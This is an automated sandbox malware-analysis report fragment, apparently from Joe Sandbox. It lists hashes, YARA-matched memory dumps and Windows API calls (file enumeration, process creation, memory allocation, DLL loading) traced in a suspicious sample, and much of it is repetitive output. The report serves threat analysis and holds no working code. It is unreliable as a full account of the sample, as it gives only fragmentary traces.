                                                                • Instruction Fuzzy Hash: 9341C6B5810318AADB20EFA4DC44FEE777CAF55300F4085D9A50EEB140EBB55758AFA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 48|}$j$}48z$}48zj$~tyl
                                                                • API String ID: 0-3623456416
                                                                • Opcode ID: 4e06277121ac7ee6be9403cb51b7ebf8f48e22d0a6623e36e8d1ea5e803889e6
                                                                • Instruction ID: 6ee2cf71fae3552f41d229a3536367bea4dbe6d291f3556fd672ab0f8cd3769f
                                                                • Opcode Fuzzy Hash: 4e06277121ac7ee6be9403cb51b7ebf8f48e22d0a6623e36e8d1ea5e803889e6
                                                                • Instruction Fuzzy Hash: F7F0A77190021C9ADF00DF98DA457EDBB70AB05314F6045A8DD55AF751E7348714DB62

                                                                Execution Graph

                                                                Execution Coverage:3.1%
                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                Signature Coverage:2.3%
                                                                Total number of Nodes:438
                                                                Total number of Limit Nodes:71

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $+$4>$5$9Typ$?-$J$K$R$U5$Wk$aj$gh$k$yp$z+${${j$[
                                                                • API String ID: 0-4151789489
                                                                • Opcode ID: c39491baa88b6e378a410c31888f29e95399699648379d5c59d404b809700552
                                                                • Instruction ID: 06be750568079695ed6b7f96a93fd5fb2f40d55b351669d14800409c47c977a8
                                                                • Opcode Fuzzy Hash: c39491baa88b6e378a410c31888f29e95399699648379d5c59d404b809700552
                                                                • Instruction Fuzzy Hash: 91229BB4D05228CBEB24CF86C994BDDBBB1BB44309F1082DAD509BB290C7B55AC8DF55
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 00C6C2AF
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 00C6C2EE
                                                                • FindClose.KERNELBASE(?), ref: 00C6C2F9
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 19292b63e4b317acbb78e3be01ab1894ace079b04d70c33c0bb853ef10a72a74
                                                                • Instruction ID: d7a41201fc9eaa1ae84bb02de36ac94ac826b2219248cbd8c8a91ddab54ca54a
                                                                • Opcode Fuzzy Hash: 19292b63e4b317acbb78e3be01ab1894ace079b04d70c33c0bb853ef10a72a74
                                                                • Instruction Fuzzy Hash: 6F31A171940348BBDB30EBA4CCC5FFF777CAB44B05F144458BD58A7191EA70AA859BA0
                                                                APIs
                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00C78CF4
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: e53c7a40a810f1b3d3a1426600ea00ef0481a5de54bcdeac6922c8fb3a5ed740
                                                                • Instruction ID: 91dfcf7718e2de2e91159cca635e31f6246baca658c3a82a38616b0e2b2f5bf6
                                                                • Opcode Fuzzy Hash: e53c7a40a810f1b3d3a1426600ea00ef0481a5de54bcdeac6922c8fb3a5ed740
                                                                • Instruction Fuzzy Hash: 4831C0B5A00209AFDB14DF98D881EEFB7F9EF88714F108219FD19A7244D730A8458BA5
                                                                APIs
                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00C78E49
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: c6e7bd6947f284e5ef1215bd066bc9917e70c7b5ef1f4a78b30f1bcd027155f5
                                                                • Instruction ID: 565f21b5b92e98956f7bb0ce757b43ef677ec0055e8b97e72edeedb2e5bc8fb3
                                                                • Opcode Fuzzy Hash: c6e7bd6947f284e5ef1215bd066bc9917e70c7b5ef1f4a78b30f1bcd027155f5
                                                                • Instruction Fuzzy Hash: 2031E7B5A00209ABDB14DF98D881EEFB7B9EF88714F108219FD18A7240D730A955CBA5
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00C619EB,?,00C77ADF,00000000,00000004,00003000,?,?,?,?,?,00C77ADF,00C619EB), ref: 00C7914B
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 00C7369B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C59A42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID: W
                                                                • API String ID: 2422867632-655174618
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00C61699,?,@,00C61699,00C7519E,@,?,00C61699,00C7519E,00001000,?,?,00000000), ref: 00C7927C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID: @
                                                                • API String ID: 1279760036-1127181893
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C64202
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00C67F4E,00000010,?,?,?,00000044,?,00000010,00C67F4E,?,?,?), ref: 00C79380
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C59A42
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4B4A49C8,00000007,00000000,00000004,00000000,00C63A03,000000F4), ref: 00C792CC
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00C67FB9
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5d33eb37139503fae119cd8b54941262d24ef44f741ec2ef06360218b2b82389
                                                                • Instruction ID: adc40c720b0e380ab8eca229b1bbb42c47f3a5fb9d41be9a39e8856bc43dd570
                                                                • Opcode Fuzzy Hash: 5d33eb37139503fae119cd8b54941262d24ef44f741ec2ef06360218b2b82389
                                                                • Instruction Fuzzy Hash: 5AE0263524030467EB24A5F8DCC2F2333488B48768F084F50F83CCB2C1D678FA024251
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00C61990,00C77ADF,00C7519E,00C61956), ref: 00C67DB0
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: fd26a4e3e3881d62e632e0248221a05b23eee4e09ee536ea7178faa923a8920d
                                                                • Instruction ID: 368cbdd5593d256d2ae2330e6aff11dc69928edb7a45d7f6f10c2045360da35a
                                                                • Opcode Fuzzy Hash: fd26a4e3e3881d62e632e0248221a05b23eee4e09ee536ea7178faa923a8920d
                                                                • Instruction Fuzzy Hash: F9E08CB27942026BF714FAB4EC42F212399AB14755F184824F908D7281EAA5A5508728
                                                                APIs
                                                                • PostThreadMessageW.USER32(?,00000111), ref: 00C60A67
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                • Instruction ID: 68bb10115b8bce0569d77a51a50f8915b71ded2cc8d25f3f07d44ec0d6e0f653
